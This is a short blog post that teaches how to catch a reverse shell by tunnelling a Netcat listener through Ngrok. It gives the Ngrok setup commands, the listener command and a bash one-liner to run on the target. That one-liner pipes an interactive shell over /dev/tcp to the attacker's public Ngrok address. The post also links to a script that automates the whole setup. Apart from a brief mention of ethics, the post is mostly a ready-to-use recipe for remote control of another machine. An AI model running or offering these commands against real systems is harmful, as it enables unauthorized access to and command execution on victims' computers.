Using Netcat with Ngrok IP for Receiving Reverse Shell

drxadz
3 min readJun 17, 2023

Introduction: In this blog post, we will explore the combination of two powerful tools, Netcat and Ngrok, to establish a reverse shell connection. A reverse shell is a technique used to gain remote access to a target machine, allowing for command execution and network exploration. By leveraging Netcat’s network capabilities and Ngrok’s tunneling functionality, we can establish a secure and versatile connection for receiving a reverse shell. Let’s dive into the step-by-step process.

Table of Contents:

  1. Overview of Netcat and Ngrok
  2. Setting Up Ngrok
  3. Configuring Netcat for Reverse Shell
  4. Establishing the Connection
  5. Automate Ngrok and Netcat Tmux Session
  6. Conclusion

Overview of Netcat and Ngrok: Netcat (often abbreviated as “nc”) is a versatile command-line tool used for network communication. It can act as both a client and a server, making it an excellent choice for establishing connections and transferring data. Ngrok, on the other hand, is a popular tunneling service that creates secure tunnels to expose local servers behind NATs and firewalls. By combining these tools, we can create a reliable reverse shell connection.

Setting Up Ngrok: To use Ngrok, follow these steps:

  • Visit the Ngrok website https://ngrok.com/ and sign up for an account.
  • Download and install Ngrok on your machine.
  • Authenticate your Ngrok account by running the following command: ./ngrok authtoken <your_auth_token>
  • Start an TCP tunnel by running: ./ngrok tcp <port> (replace <port> with the port number you wish to Connect your revers shell)
After running the ngrok command we will a screen like this
  • We can see that a new domain and post assigned to our Host
  • Lets find the ip of the ngrok domain using dig command
Now we got our public IP

Configuring Netcat for Reverse Shell: To configure Netcat for receiving a reverse shell, you need to:

  • Open a terminal or command prompt on the machine where you want to receive the reverse shell.
  • Start a listener by running the following command: nc -lnvp <port> (replace <port> with the port we mentioned in ngrok).

Establishing the Connection: To establish the connection, follow these steps:

  • On the target machine (the one you want to access), run the following reverse shell command.
  • In a terminal or command prompt, run the following command: bash -c ‘exec bash -i &>/dev/tcp/<ngrok_IP>/<ngrok_port> <&1’(replace <ngrok_ip> and <ngrok_port> with the provided Ngrok tunnel details).
I am using bash Reverse shell
  • If successful, you should see a connection established message on the Netcat listener terminal.
Successfully received reverse connection in ngrok

Automate Ngrok and Netcat Tmux Session: This script sets up a multi-pane Tmux session with mouse support, utilising ngrok to expose a specified port. It provides an organised and convenient environment for running ngrok, displaying the public IP and port information, and listening for incoming network connections.

Download link : https://github.com/drxadz/Multi-nnt

Conclusion: In this blog post, we explored using Netcat with Ngrok to create a reverse shell connection. By leveraging the network capabilities of Netcat and the tunnelling functionality of Ngrok, we can establish a secure and versatile remote access solution. Remember to exercise caution and use this technique responsibly and ethically.

By combining these powerful tools, you can expand your penetration testing toolkit and gain a deeper understanding of network communication and security. Happy hacking!

--

--